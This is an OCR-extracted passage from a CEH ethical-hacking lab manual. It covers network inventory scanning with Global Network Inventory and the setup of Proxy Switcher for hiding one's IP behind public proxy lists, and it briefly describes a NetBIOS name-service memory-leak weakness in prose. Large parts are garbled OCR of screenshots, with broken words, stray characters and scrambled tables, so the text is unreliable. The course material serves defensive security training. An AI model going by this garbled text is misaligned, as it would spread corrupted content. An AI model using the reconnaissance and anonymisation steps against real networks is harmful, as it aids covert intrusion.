■ f c f1 M 0 T '(\ v i‘ N 6 3 9 . 7
‘ 10. 0. 1‫>נ* ר‬V IN -IJI Y8...

J^

Opcra.i-1 0 Cvs.or

a Scan only items that you need by customizing scan elements

{■

10 1 *1‫ו‬

» U » d /

R «t u ttt h itto ry d«pth: Latt t o n fo r ta c ft a f lc r t t;

Q 't p lt /« d group: All gro u p t

FIGURE 11.14: Global Network Inventory Bios summary tab 16. T l i e Memory ta b s u m m a r i z e s d i e m e m o r y i n y o u r s c a n n e d m a c h i n e .

£□ E-mail address Specifies the email address that people should use when sending email to you at this account. The email address must be in the format name(ftcompany— for example, someone@mycom pany.com

Global Network Inventory - Unregistered
Fie
View Scan Tools Reports help

*

• ‫ח‬
▼ a x

H e
■» * I "J*

V

i B l B & l m l H F i - ii i
L• j0> Mentors tf| |g j

®
Logical d ak s t M Oak ± n - ‫!־־־‬:••> Network a d ^ c n !

vw w r» u R <

\ M 0 © coofirokn

** s« a
N am * H %

‫מ‬

«

Operating S,‫׳‬d-• ‫׳׳■)׳‬ti‫״‬ fff

y - . ‫■־ ■־־‬ •

c t*n o c t«

■ t •5
UMfcro‫״‬

Q

A ll *d d tess e*

D»ve*t

[#]

N *BI0S

|I

Shw*1

p

% -

‫■׳‬s t a r t u p |k ‫ם‬ ‫«י‬ » » ‫>י‬
IIwt or
MwitMV f l w f «

1 ‫י»ת‬0 ‫ו׳*חווו‬

| 'J.

b*r/1r*c

4

#

WORKGROUP

‫־‬ ■ *w

p y ‫־‬

j

■m I0.C .0.4 (W IN -U L Y 8 ...

d [D

Td a lP h ^ c d v e n w x / .M a

-

S a la b le H -yrea... -

Total vfc u a L. ~

A v a to e V rtja ... -

lo t a ...- -

ftvalable..■-

V .C R t 5 F 0 U P [C r M J N '= ] J Hcsr Marre 3 9 ^ ^ ‫־‬MF 5 HL 9 E4 (C0U !\iT=1) J ‫ ־‬hres-aap f t 2 ‫ ׳‬22/ ‫׳‬C12 3:36 3B PM (COUNT‫| ) ־‬ 3317

7 o b i 1 its u ;1

Results history depth: Last scan for each address

O iip la /e d group: A ll groups

FIGURE 11.15: Global Network Inventory Memory tab 1 7 . I n d i e N etBIO S s e c t io n , c o m p l e t e d e ta ils c a n b e v ie w e d .

C EH Lab Manual Page 195

Ethical Hacking and Countermeasures Copyright O by EC ‫־‬Counc11 All Rights Reserved. Reproduction is Strictly Prohibited

M o d u le 0 3 - S c a n n in g N e tw o rk s

Global Network Inventory ‫ ־‬Unregistered
F ie v ie w Son Tools Reports Help

;-!or

! □

is ?

i B i a i a s p

5 ! ■ !a

&

»

B

V*y* results

Mencry

®S

Memory device( |; & ■ Services Destdop logged on

Narre
-

Message subject Type the Subject of your message. Global Network Inventory cannot post a message that does not contain a subject

& Ia d d r e s s e s B-fi‫־‬W O R K G R O U P 1 C . 0 . C . ’ (W IN D 3 9 .
19 1 0 ^ f^ U L Y « ::

‫ד‬

4•

Scan

3 JT T m a rv

S)

hitdted«yt*sre Cl nvmmgrt Qf
S*drt/M ‫׳‬t«r |."3‫ל‬ Startup

Port conrwctre

Cl

zJ Harr l l i n* 0 33* | , ‫\ ׳‬ ‫י‬v F5H. = )E4 (COLNT= 3 ) Tir^HatF B/22;2C12 3:3ft 38 FM (COUN T3‫)־‬ *[V/K-039M Ro-LSE4<0>aJ> X 3 WORKGROUP < 0x00> Lmqj? Unque Group Woikstatcr Service Fie Server Service Domain Name

W KC •SMR^LSE4<Ox20S‫־‬

Toid3i.enld Rea fly Remits history depth ia<t scan ret earn naorett
t»< pt»/»d g ro u p : All g ro u p s

FIGURE 11:16: Global Network Inventory NetBIOS tab 18. T h e User Groups ta b s h o w s u s e r a c c o u n t d e ta ils w i t h d i e w o r k g r o u p .

G'obel Network Inventory ‫ ־‬Unregistered
F ie V ie w Scan Tools Reports Help

I‫ ־‬1 ‫ם‬

□ Name Specifies the friendly name associated with your e-mail address. When you send messages, this name appears in the From box of your outgoing messages

[□ E T |E p |g |B ) |• ‫ ־‬IB; * a

■a

H I as a □ * 3$
Narr« *i* All address•: - i f WORKGROUP

? S iiilL » •ia iJiw N S :‫׳‬

e m o r y ‫ מ‬M c n t c r y c f c v c c s 2 C o n ju t as r r f — Q P r c c c 3 5 0 r a | ^ M a rb o a r d I^ J) M ■P r r tc o • >N e t t e d ‫־‬ ,o d a t f c o » ‫־‬ c c c •I‫־‬: k V e n t‫ה‬ ‫ר‬ L o c ic o ld b k s ^ D » s d r > c * ‫י‬ m # >C IO ‫ כ‬jj] O p c r a lin q C y s lc r r Q n -n vro rm o n t c r 7‫י‬ Q ij0 « • ^ D e v ic c : It # ] N e tC lD C ^ S h a r e s |J? Jxryw A -_ b e r a I, L o jj= d o r
J Ctoitup ■ Deaktoo

H o s tN c n e ‫־‬/ / * -D39-4R5H L9E4(C OU N T-51 z i ' rre s c a n p : E /2 2 '2 0 1 2 3:36:38 FM ( COUN5- ‫] ל‬ z i G io jj ^ r w 'is ’rafcr: (C 0U N T =1) U5cr occcurt

/ / ! S 0 CEN R 5HL3E4'>Adrim$tratoi z i Gr^JD : C K ttK ited CUM Useis (COUN I - 1 1 W lS-O394R5HL3E4\Ad1rini?trdt01 _ J G r» ^ o : Gue:»; C O U N T -1 ) Jk• Ul f l r<03‫־‬ E M R 5 H L g 5 \ 4 ‫־‬ussl d C 1 0 * .IIS J U S fiS C O U N T■ !)

U ;e 1 accourt

U8#f accourt

% N T >‫ ־‬F \lZcV^cpcrlSc«vor z i G ro w

VV«# krcv‫ ׳‬n gtcup oooounl

Pfftavure*1 r g

U n i t (COUNT ■1)

TU0I5 i cn|i| Rsad/ RcsuMts history depth: Lost scan foi each ooaes! Displayed group; All qioupa

FIGURE 11.17: Global Network Inventory User groups section 19. T h e Logged on t a b s h o w s d e ta ile d lo g g e d o n d e ta ils o f d ie m a c h i n e .

C EH Lab Manual Page 196

Ethical Hacking and Countermeasures Copyright O by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited

M o d u le 0 3 - S c a n n in g N e tw o rk s

Globa! Network Inventory ‫ ־‬Unregistered
Me view 5<ar tools Reports Help

1 - 1‫■ ״ ■ ״‬

§3-□Is ? Hc1®e/
V«w resuKs

-•1a
^

& ‫׳״‬
£
L > j1 d j s v j

*2 »‫־ י‬ ‫ □־‬m
N e ir c _

J
\

‫ וג ב‬a id syiefi Scansuranaiy Port comedo* C ‫־‬ ‫־‬ r■ ^r . ^ Q}

Q BICS '* {3 0 S

Processors |.§)

Main beard
Q

^

Nenoiy

w
£■

Memory de/ces
Net ■ .

Di:-•. J .

m

Ooefatro System | Hotfixes Sfia'es 2'

l£‫ )־‬totaled software | ( | ^ S e a it) eerier U stty. >

Environment _J■ Users | j>

Services | Logged or J

E % All addresses S f WORKGROUP

System slots

3.< n:u,__H L_2 s5 tlSB_J

& Port ‫ ־‬Specifies the port number you connect to on your outgoing email (SM TP) server. This port number is usually 25.

;1dbix7"(wi‫׳‬N-D3g... ;■ '160.04 (WIN-ULY8...

Ho a N o k WH-033NR5HL3E4 (COUNTS
1 NT SERV.CE > MsDisServerl 10 f H” SERVCE'MSSQLFDLounchct *, N‫ ־‬S£RVC£\MS$QLSERVER f N‫ ־‬SERVCE'MSSQLSer/eiOLAPSeiviee * , N‫ ־‬SERVCE'RcportScrva £ \A H D39MREHL9E4\A<irnriatral:or 38/22/12 09:01:20

R o d /

Results fcitory depth lost icon lor toch address

Oowove^rou^lUroups

FIGURE 11.18: Global Network Inventory Lowed on Section 2 0 . T h e Port connectors s e c t io n s h o w s p o r t s c o n n e c t e d i n d i e n e tw o r k .

ST
File

Globa' Network Inventory - Unregistered
Scan Toolt Report( Help

1S
vipwr^ui:

wax
L. ; c j n c u r r r jr ,

NetBIOS
n l-bntcrj

£
Fiocessois £

Sharps
^ Logcal disks

J i.

Lfte
D:

Outgoing mail (SMTP) ‫ ־‬Specifies your Simple Mail Transfer Protocol (SMTP) server for outgoing messages

N a m e
H-

a ‫ ש‬b #
*

1
may Q a

User*

| •£‫־‬ ‫׳‬

Logged on Memory d evus Networx 0d3?1cr: S «m :« Desktop !r j

M < ji1 b0 f J

All SddtKteS f r £* WORKGROUP

WOS

|S )

0p«1fcrg S y r« r

‫—ן‬

fcrvronm^nt | Startup

P o r tconnectors

■ »F ll^ T fMM‫״‬ ‫־‬ Di‫־‬ 9 ■ ‫־‬ ‫־‬ ‫־‬ ‫־‬ ‫־‬
0 ^10 ‫«־‬.(W‫׳‬fW‫׳‬N‫־‬ULY8""

JO

^

hrr ‫י‬

Jh e * • H a re :t * ‫׳‬T .D 3 9 M R 5 H L J 3 E 4 ( C O U N T 2 5 ) ’7 3 ‫״‬ D H ‫ז‬7‫כ‬ ‫כ‬ » ’7O D H ’7 0 3 H t 7o 0 h ’7 0 3 1 1 ,7 0 3 H ‫ ז‬alal 25 A tris
J 1■ ‫*״‬ttaro : &'22/2D12 33638 PM (COUNT = 26)

Dorian. V/D^KOROU? (C0UNT=25I

S e r ia lP o r1 S 5 5 C A C o n p a t t le K e y t » 0 1d P o r t M o u c cP o r i U S B U S B U C D U S B

D 6 9 ‫־‬ . M a le F S / 2

F S / 2 & m > 5 1 b u s

* C C O H . b lM A c o # s t .b u t
Disj ayecl arouo; All aroups

Fes jts nistory deptn: Last scan foi ecdi cCtite><

FIGURE 11.19: Global Network Inventory Port connectors tab 2 1 . T h e Service s e c t io n g iv e d i e d e ta ils o f d ie s e r v ic e s in s ta l le d i n d i e m a c h i n e .

C EH Lab Manual Page 197

Ethical Hacking and Countermeasures Copyright O by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited

M o d u le 0 3 - S c a n n in g N e tw o rk s

S To create a new custom report that includes more than one scan element, click choose Reports | Configure reports from the main menu, click the Add button on the reports dialog, customize settings as desired, and click the OK button

Globa! Network Inventory ‫ ־‬Unregistered
Me view 5rar Tools Reports Help

R

= r

‫ ־‬- $*]‫ ־® בס‬H e p H B ]® e |
View re<ufts

• -•Eg D
n System slots
3

& ‫׳״‬
| Hotfixes ^ Secut) center £ Startup ■
|

* 1*9 2 □ m
N e ir c _

Usercroups Mainboard | ^

Jsers NetBOS | Memory Qf

Loaaedor Msrrcryde/ces Desktoo
S c r r is o |

Port cornedas

E % All addresses
S f W O RKGRO UP

" »
M


1•

i
0 .‫ גי‬c t i u Svtte ‫״‬ ig (

'
13

jjjj*
:‫ ויין‬u n i c i t

• 1 ‫־‬y 'a a ’7 iw i‘N-D38’‫’ "״‬ ;■ '160.04 (WIN-ULY8...

N » ♦
z i Domr* V»ORC13RO UP |CDUMI«l4/) _!J Hcs‫* ׳‬sLan^ WIM^»IR5HL9E4(COUNT■!47| zi rr^ an p 3/22!20H 3 3&38FM [COUNT =147)
.

41loma1‫׳‬e Manual R u fM rg R u m rg R j 'i ' i r g ‫־־‬: 'P?! 1 g -a n F ilei [vf‫־‬fc)\Comrmn Fite'iAdobi C‫ ־‬vV.mdowt\system32\svehott eye •k netsv C «V.»Klowt\^1srern32\fivch0ftexe •k apphr

Ldcte A c x b 2t U pcare S e r/ c e
fcanon Host Helper Service

, £ p f teanon E>o=r1enee .

Automatic
Manual Manual Manual Manual

^ A p p fc a n o n Identtji A pflcanon Intonation . Apffcrariofi Layer 5 areway Service A pffcarion M anarjenenr

S tc ff e d
R im r g

C‫\*־‬fcmdow1\svstem32\svc*r0ft.exe •k Local C »V.m<tem(t\sysiern32\svcf10fr.exe •k netsv
C ,V,mdowt\S3i5tem32Ulg )= «‫<־‬

S iq ^ ie d

C »\Mn<low?\system32Nsvchotr exe •k n e tw

10taH47 toart:J

R o d /

Results fcitory depth lost icon lor to<h address

Oowove^rou^lUroups

FIGURE 11J20: Global Network Inventory Services Section 2 2 . T h e Network Adapters s e c t i o n s h o w s d i e Adapter IP a n d Adapter type.
Global Network Inventory ‫ ־‬Unregistered
Fie view Stan Tools Reports Help

1 ‫־‬

I* ‫״‬
'/cwrcsuR;

1 t*g a • □ e v
▼ ‫ ל‬X
^ j| y H D c*c« [# J Conputer ‫>־ת‬€*‫ו‬ Tort c«m ed oo Scan ajrrrcrv ^ Q Q

Q 'l l & < ‫״‬ ‫׳‬
NetBIOS | ^ Prooeaaora System alots 80S |‫׳‬jgj] |^ SK3X3 4■ U3cr<rouF3 fjj JL• Memory j* B Uacn B?1 Startup Envtrontnonrt ^ Looocdon Mom boane Hotfixes ^ Memory devices |H I ‫׳‬J, Desktop Sorvcoo Ccc^rfy eerier IrwUkd •oftwuo

r l
& A security account password is created to make sure that no other user can log on to Global Network Inventory. By default, Global Network Inventory uses a blank password
Narr<

^ □E $
y ~ * £ WORKGROUP ■- m o ‫״‬M ( w n ' u’ l^ "."’

B V^l All addr»<«#e

Cporatrj Syotom

h ■ v®0 0

1 -

?‫מ‬

|v

- Tinettarp: ‫ך‬

1 r j 2 > 2 3 3 6 : 3 3 3 2 ‫ ־‬FM (COUNT-1 1
l2552EE.2g|1H.01 [vicreolt |E therrct QIC|N0

g • W w iih w lE fo . |P4:BE:D9:C|100.D7

I otall ren^j

R e a ^

^esujt^jjto^jepth^as^a^o^seJ^ddrts^

FIGURE 11.21: Global Network Inventory Network Adapter tab

L a b A n a ly s is
D o c u m e n t all d i e I P a d d r e s s e s , o p e n p o r t s a n d r u n n i n g a p p lic a tio n s , a n d p r o t o c o l s y o u d i s c o v e r e d d u r i n g d ie la b .

C EH Lab Manual Page 198

Ethical Hacking and Countermeasures Copyright O by EC ‫־‬Counc11 All Rights Reserved. Reproduction is Strictly Prohibited

M o d u le 0 3 - S c a n n in g N e tw o rk s

T o o l/U tility

I n f o r m a tio n C o lle c te d /O b je c tiv e s A c h ie v e d I P S c a n R a n g e : 1 0 .0 .0 .1 — 1 0 .0 .0 .5 0 S c a n n e d I P A d d r e s s : 1 0 .0 .0 .7 ,1 0 .0 .0 .4 R e s u lt: ■ S can su m m a ry B io s M e m o ry N e tB IO S U se rG ro u p L ogged O n P o rt c o n n e c to r S e rv ic e s N e tw o rk A d a p te r

G lo b a l N e tw o r k In v e n to ry

■ ■ ■ ■ ■ ■ ■ ■

PL E A S E TALK T O Y O U R I N S T R U C T O R IF YOU H A V E Q U E S T I O N S R E L A T E D T O T H I S LAB.

Q u e s t io n s
1. C a n G lo b a l N e tw o r k In v e n to r y a u d it re m o te c o m p u te rs a n d n e tw o rk a p p lia n c e s , a n d i f y e s , h o w ? 2. H o w c a n y o u e x p o r t th e G lo b a l N e tw o r k a g e n t to a s h a re d n e tw o rk d ir e c to r y ? In te r n e t C o n n e c tio n R e q u ire d

□ Yes P la tfo rm Supported 0 C lassro om

0 No

0 iL a b s

C EH Lab Manual Page 199

Ethical Hacking and Countermeasures Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited

M o d u le 0 3 - S c a n n in g N e tw o rk s

A nonym ous B row sing u sin g P roxy S w itc h e r
Proxy Switcher allowsyou to automatically execute actions; based on the detected netnork connection.
I C O N p=7 K E Y

L a b

S c e n a r io
scan s u m m a ry , N e tB IO S

V a lu a b le in f o r m a t io n

111 t h e p r e v i o u s l a b , y o u g a t h e r e d i n f o r m a t i o n l i k e

d e t a ils , s e r v ic e s r u n n i n g o n a c o m p u t e r , e tc . u s i n g G l o b a l N e t w o r k I n v e n t o r y .
Test your k n o w le d g e w

N e tB IO S

p r o v id e s

p ro g ra m s w ith

a u n if o r m

set o f c o m m a n d s

f o r r e q u e s t in g

d i e l o w e r - l e v e l s e r v ic e s d i a t d i e p r o g r a m s m u s t h a v e t o m a n a g e n a m e s , c o n d u c t
W e b e x e r c is e

s e s s io n s , a n d been

send in

d a ta g ra m s

b e tw e e n

nodes

on

a n e tw o r k . V u ln e r a b ility one o f th e

lia s

Q

W o r k b o o k r e v ie w

id e n tifie d

M ic r o s o ft W in d o w s , w h ic h

in v o lv e s

N e tB IO S

o v e r T C P /IP s e r v ic e , t h e

( N e t B T ) s e r v ic e s , t h e N e t B I O S fin d a c o m p u t e r ’s I P

N a m e S e rv e r ( N B N S ) . W it h d iis a d d re s s by u s in g it s N e tB IO S

a tta c k e r c a n

n a m e , a n d v ic e v e r s a . T h e r e s p o n s e t o a N e t B T n a m e s e r v ic e q u e r y m a y c o n t a in ra n d o m d a ta fro m th e d e s tin a tio n c o m p u t e r ’s m e m o r y ; a n a tta c k e r c o u ld seek

to e x p lo it th is v u ln e r a b ilit y b y s e n d in g th e d e s tin a tio n c o m p u t e r a N e t B T n a m e s e r v ic e q u e r y a n d t h e n l o o k i n g a n y ra n d o m d a ta f r o m c a r e fu lly a t th e re s p o n s e to d e te r m in e w h e t h e r

t h a t c o m p u t e r 's m e m o r y is in c l u d e d . t y p ic a l s e c u r ity p r a c tic e s , t o P ro to c o l scanned

A s a n e x p e r t p e n e t r a t io n te s te r, y o u s h o u ld f o llo w

b lo c k s u c h In t e r n e t- b a s e d a tta c k s b lo c k th e p o r t 1 3 7 U s e r D a ta g r a m (U D P ) a t th e fir e w a ll. Y o u m u s t a ls o u n d e rs ta n d h o w n e tw o rk s a re

u s in g P r o x y S w it c h e r .

L a b

O b je c t iv e s
to use P ro x y

T h is la b w i l l s h o w y o u h o w n e t w o r k s c a n b e s c a n n e d a n d h o w S w it c h e r . I t w i l l te a c h y o u h o w ■ ■ to : th e w e b s ite s y o u v is it

H id e y o u r IP a d d re s s f r o m

P r o x y s e rv e r s w itc h in g f o r im p r o v e d a n o n y m o u s s u r fin g

C E H Lab M anual Page 200

E th ic a l H ackin g and Counterm easures Copyright © by EC-Council A ll Rights Reserved. Reproduction is Strictly Prohibited.

M o d u le 0 3 - S c a n n in g N e tw o rk s

L a b

E n v ir o n m e n t

T o c a n y o u t th e la b , y o u n e e d : ■ P r o x y S w it c h e r is lo c a t e d a t D:\CEH-Tools\CEHv8 Module 03 Scanning Networks\Proxy Tools\Proxy Sw itch er P ro x y W o rk b e n c h fro m

2 " Tools d em o nstrate d in th is lab are a va ila b le in D:\CEHTools\CEHv 8 M odule 03 S canning N e tw o rks

Y o u c a n a ls o d o w n l o a d t h e la t e s t v e r s io n o f th is l i n k h t t p : / / w w w . p r o x y s w it c h e r . c o m /

I f y o u d e c id e t o d o w n l o a d t h e la t e s t v e r s io n , t h e n s c r e e n s h o t s s h o w n i n t h e la b m i g h t d i f f e r

■ ■ ■ ■

A

c o m p u te r r u n n in g

W indows Server 2012

A w e b b ro w s e r w ith In te r n e t access F o l lo w W iz a r d - d r iv e n in s t a lla t io n s te p s t o in s t a ll A d m i n i s t r a t i v e p r iv ile g e s t o r u n t o o ls

Proxy Sw itch er

L a b

D u r a t io n

T im e : 1 5 M in u te s

O v e r v ie w

o f P r o x y S w it c h e r

P r o x y S w it c h e r a llo w s y o u t o a u t o m a t ic a lly e x e c u te a c tio n s , b a s e d o n th e d e te c te d n e t w o r k c o n n e c t io n . A s t h e n a m e in d ic a te s , P r o x y S w it c h e r c o m e s w i t h s o m e d e f a u l t a c t i o n s , f o r e x a m p l e , s e t t i n g p r o x y s e t t in g s f o r I n t e r n e t E x p l o r e r , F i r e f o x , a n d O p e ra .

L a b
C l A u to m a tic

T a s k s
In s t a ll P r o x y W o r k b e n c h i n

change o f proxy c o n fig u ra tio n s (or any o th e r a ctio n ) based on n e tw o rk in fo rm a tio n

1. 2.

W indows Server 2012

( H o s t M a c h in e )

P r o x y S w it c h e r is lo c a t e d a t

D:\CEH-Tools\CEHv8 Module 03 Scanning Netw orks\Proxy Tools\Proxy S w itch e r
th e w iz a r d - d r iv e n in s t a lla t io n s te p s a n d in s t a ll i t i n a ll p la t f o r m s

3.

F o llo w o f th e

W indow s operating system .
la b e n v ir o n m e n t - o n

4.

T h is la b w i l l w o r k i n th e C E H

W indow s S e rve r

2012, W indow s S e rve r 2008‫ י‬a n d W indow s 7
5. O p e n th e F ir e fo x b r o w s e r in y o u r c lic k

W indows Server 2012, g o

to

Tools,

and

Options

in d ie m e n u b a r.

C E H Lab M anual Page 201

E th ic a l H ackin g and Counterm easures Copyright © by EC-Council A ll Rights Reserved. Reproduction is Strictly Prohibited

M o d u le 0 3 - S c a n n in g N e tw o rk s

Google Moiillo Fitefox
colt | HtJp Qownloatfs moderns S< * UpS^K. CW-I c m * v ‫*«״‬A

e Documents Calendar Mote •

•!1• ■ cc 9 u

fi *

C3 Often different
internet connections require com pletely different proxy server settings and it's a real pain to change them m anually

♦ Yo u

Search

Images

Web Developer Page Info

Sign n
Cle«r Recent Ustsr.

01 + “ Sh1 ft*IW

G o o g le
Gocgie Search I'm feeling Lucky

A .««t> ng Piogam m ei

6 11

Business SolUion*

P ir a c y t Te

•Google

Aboul Google

Google com

F IG U R E 121 : F ire fo x o p tio n s tab

6.

G o

to

d ie

Advanced

p r o file in

Network

ta b , a n d d ie n c lic k

d i e Options Settings. Options

w i z a r d o f F i r e f o x , a n d s e le c t

‫§י & ם‬
General Tabs Content General | MetworV Connection

%
Applications

p
Privacy

* k
Secuiity

3

S>nc

Advanced

j Update | Encryption j

3 k ‫׳‬

P r o x y S w itc h e r fu lly

Configure how h re fo i connects to the Internet

|

S g tn g i.

c o m p a tib le w ith In te r n e t E x p lo r e r , F ir e fo x , O p e ra a n d o th e r p ro g ra m s

Cached W eb Content Your vreb content cache > scurrently using 8.7 M B of disk space I I Override a u to m ate cache m anagem ent

Clear Now

Limit cache to | 1024-9] MB of space
Offline Web Content and User Data You 1 application cache is c jiie n t l/ using 0 bytes 0 1 disk space M Tell me when a wefccite aclrt to store Hat* fo r offline uce The follov/ing tvebsites aie a lowed to store data for offline use
Clear Nov/

E x c e p tio n s ..

B a r eve..

OK

Cancel

Help

F IG U R E 1 2 2 F ire fo x N e tw o rk Settin g s

7.

S e le c t d i e

Use System proxy settings

r a d io b u t t o n , a n d c lic k

OK.

C E H Lab M anual Page 202

E th ic a l H ackin g and Counterm easures Copyright O by E C ‫־‬Counc11 A ll Rights Reserved. Reproduction is Strictly Prohibited

M o d u le 0 3 - S c a n n in g N e tw o rk s

Connection Settings
Configure Poxies to Access the Internet O No prox^

‫ייי ־‬

'‫ )־‬Auto-detect proxy settings fo r this network (•) Use system proxy settings
M a n u a l p roxy co n fig u ra tio n :

f i proxy switcher supports following command line options: -d: Activate direct connection

HTTP 5rojjy:

127.0.0.1 @ U je this prcxy server fo r all protocols

SSLVoxy: FTP *ro xy. SOCKS H o s t

127.0.0.1 127.0.0.1 127.0.0.1 O SOCKS v4 ® SOCKS v5

P firt P o rt P o rt

No Pro>y f o r localhcst, 127.0.0.1

Example: .mozilla.org, .net.nz, 192.168.1.0/24 O Autom atic proxy configuration URL: Reload

OK

Cancel

Help

F IG U R E 12.3: F ire fo x C o n n e c tio n Settin g s

8.

N o w

t o I n s t a ll P r o x y S w it c h e r S ta n d a r d , f o l l o w

th e w iz a r d - d r iv e n

in s t a lla t io n s te p s . 9. T o la u n c h P r o x y S w it c h e r S ta n d a r d , g o t o

S ta rt

m e n u b y h o v e r in g d ie

m o u s e c u r s o r in d ie lo w e r - le ft c o r n e r o f th e d e s k to p .

TASK

1

Proxy Servers Downloading

F IG U R E 1 2 4 : W m d cK vs S e rv e r 2012 - D e s k to p v ie w

10. C lic k d ie w in d o w .

P roxy S w itc h e r S tandard

a p p t o o p e n d ie

Proxy S w itc h e r

O R C lic k

P roxy S w itc h e r

f r o m d i e T r a y I c o n lis t .

C E H Lab M anual Page 203

E th ic a l H ackin g and Counterm easures Copyright O by EC-Council A ll Rights Reserved. Reproduction is Strictly Prohibited

M o d u le 0 3 - S c a n n in g N e tw o rk s

S ta rt

A d m in is tra to r ^

Server Manager

Windows RowerShetl
W

Google Chrome * Hyper-V Machine...

Hyper-V Marvager 91

£□ Proxy S w itch er is free to use w ith o ut lim itations for personal and com m ercial use

Global Network Inventory S I

Fsb

Compute

Control Panel
v

Centof...
K

y .

9
M021I4

Command Prompt
v rr

PKKVSw* *

Frefox <0 Proxy Checker ,‫י‬ *

£«p«-

CM *up

.‫►ר‬

F IG U R E 125 : W in d o w s S e rv e r 2012 - A p p s

at*
‫ם‬ i f th e s e rv e r b e c o m e s

o

in a c c e s s ib le P r o x y S w itc h e r w ill tr y to fin d w o rk in g p ro x y s e rv e r ‫ ־‬a re d d is h b a c k g ro u n d w ill b e d is p la y e d t ill a w o rk in g p ro x y s e rv e r is fo u n d .

s S e rv e r. A /Q

Customize...

ja te

D a ta c e n te r 8400

\ t— 1 l A r - r ‫ ״‬/ 1 ‫!׳‬

^ D p ^ u ild

F IG U R E 126 : S e le ct P ro x y S w itc h e r

11. T h e

P roxy L is t W izard

w ill a p p e a r as

s h o w n i n d ie f o llo w in g fig u r e ; c lic k

N ext

C E H Lab M anual Page 204

E th ic a l H ackin g and Counterm easures Copyright O by E C ‫־‬Coundl A ll Rights Reserved. Reproduction is Strictly Prohibited

M o d u le 0 3 - S c a n n in g N e tw o rk s

Proxy List Wizard

£3 ‫ ־‬P roxy S w itc h e r ssu pp orts fo r LAN, dialup, VPN and o th e r RAS c o n n e ctio n s

W elcom e to th e Proxy S w itcher
Using this wizard you can quickly complete common proxy list managment tasks. To continue, dick Next

@ Show Wizard on Startup

<Back

Next >

Cancel

F IG U R E 12 7 : P ro x y L is t w iz a rd

1 2 . S e le c t d i e fro m

Find N ew Server, Rescan Server, R echeck Dead
a n d c lic k

r a d io b u t t o n

Com m on Task,

Finish.

Proxy List Wizard
Uang this wizard you can qcackly complete common proxy lot managment tasks Cick finish to continue.

& ‫ ־‬Proxy s w itc h in g from com m and line (can be used a t logon to a u to m a tic a lly s e t co n n e ctio n se tting s).

C o m m o n Tasks
(•) find New Servers. Rescan Servers. Recheck Dead O Find 100 New Proxy Servers O find New Proxy Severs Located in a Specific Country O Rescan Working and Anonymous Proxy Servers

0 Show Wizard on Startup

< Back

Finish

Caned

F IG U R E 12.8: S e le c t co m m o n tasks

13. A

lis t o f

dow nloaded proxy servers

w i l l s h o w i n d ie l e f t p a n e l.

C E H Lab M anual Page 205

E th ic a l H ackin g and Counterm easures Copyright O by EC-Council A ll Rights Reserved. Reproduction is Strictly Prohibited

M o d u le 0 3 - S c a n n in g N e tw o rk s

Proxy Switcher Unregistered ( Direct Connection ]
File Edit A ction s V iew Help

I
Filer Proxy Servers

M

‫א‬ A

W h e n P r o x y S w itc h e r is r u n n in g in K u fh A U v e m o d e it trie s to m a in ta in w o rk in g p ro x y s e rv e r c o n n e c tio n b y s w itc h in g to d iffe r e n t p ro x y s e rv e r i f c u rre n t d ie s

Roxy Scanner M * New (683) B ‫ &־‬high Aronymsus (0) SSL (0) £ : Bte(O) i ‫ מ‬Dead (2871) 2 Permanently (656?) 1 — Book. Anonymity (301) ‫—ן‬ -£ 5 ‫ ־‬Pnva!e (15) V t t Dangerous (597) f~‫־‬ & My P0‫ *׳‬/ Servere (0) :— PnwcySwitchcr (0)

Serve* , ? 93.151.160.197:1080 £ 93.151.1€0.195:108Q 93.150.9.381C80 knnel-113-68vprforge.com , f 93 126.111210:80 £ 95.170.181 121 8080 < ? 95.159 368 ‫ו‬C 95.159.31.31:80 95.159 3M 4 80 , f 94.59.250 71:8118

*

-

................

State Testino Teetirg Testing Lhtested Lhtested lht*ct*d Lhtested Lhtested Lhtested Lhtoetod _ _ Lt itcatgd___

ResDDnte 17082ns 17035n« 15631ns

Countiy H RJSSIAN FEDERATION m a RJSSIAN FEDERATION RJSSIAN FEDERATION * “ — “ ^ 5
C

UNITED STATES SYR;AM ARAD REPUBLIC b ‫ ׳‬KAN AKAB KtPUBLIt SYRIAN ARAB REPUBLIC UNITED ARAB EMIRATES UNITED AR\B EMIRATES

m a RJSSIAN FEDERATION

Caned
S te fre

S ta te
Conpbte Conpfcte

Progress

MZ3

Core PrcxyNet wviw.aliveoroxy .com ‫״‬mw .cyberayndrome .net w!w nrtime.com<

28 kb

Fbu‫»׳‬d 1500

&
F IG U R E 1 2 9 : L is t o f d o w n lo a d e e d P r o s y S e rv e r

D L

14. T o

stop
Actions

d o w n lo a d in g d ie p r o x y s e rv e r c lic k Proxy Switcher U nregistered ( Direct Connection )

L = Jg ' x 1
filer Fox/ Servers

File

Edit

View

Help

«
r

‫ ־‬Proxy Scanner ♦ N#w (?195)
W h e n a c tiv e p ro x y s e rv e r b e c o m e s in a c c e s s ib le P r o x y S w itc h e r w ill p ic k d iffe r e n t s e rv e r fro m P r o x y S w it c h e r c a te g o r y I f th e a c tiv e p ro x y s e rv e r is c u r r e n tly a l i v e th e b a c k g ro u n d w ill b e g re e n H

\y

Serve* £ 001 147 48 1€‫«»* ־‬tw n«t
£ £ £ £ £

Aicnymouo (0)

lml5+1S»-11065.a«vwd»

I••••©‫ ׳‬SSL (0)

|

fc?Bte(0)

B ~ # Dead (1857)
= • • • • {2 ' Permanently 16844] Basic Anonymity (162) | ^ Private (1) j- ‫־‬ & Dangerous \696) h‫־‬ & My Proxy Servers (0J - 5 ‫ ׳}־‬ProocySwtcher (0)

218152.121 184:8080 95.211.152.218:3128 95.110.159.54:3080 9156129 24 8)80 u>4 gpj 1133aneunc co p jf dsd»cr/2'20Jcvonfcrc com: 91.144.44.86:3128 £ 91.144.44.8$:&80‫נ‬ 92.62.225.13080: ‫ר־‬

Slate (Aliv«-$SL) (Alive-SSL) (Alive-SSL) (Alive-SSL) (Alive-SSL) (Alive-SSL) (Alive-SSL) (.*Jive-SSL) (Alive-SSL) (.Alive-SSL) (Alive-SSL)

Resronte 13810nt 106Nh* 12259ns 11185ns 13401ns 11&D2ns 11610m 15331ns 11271ns 11259ns 11977ns

Couriry J HONG KONG | ITALY »: REPUBLIC OF KOREA “ NETHERLANDS !IT A LY ™ UNITED ARAB EMIRATES •: REPUBLICOF KOREA 5 SWEDEN “ SYRIAN ARAB REPUBLIC ” SYRIAN ARAB REPUBLIC — CZECH REPUBLIC

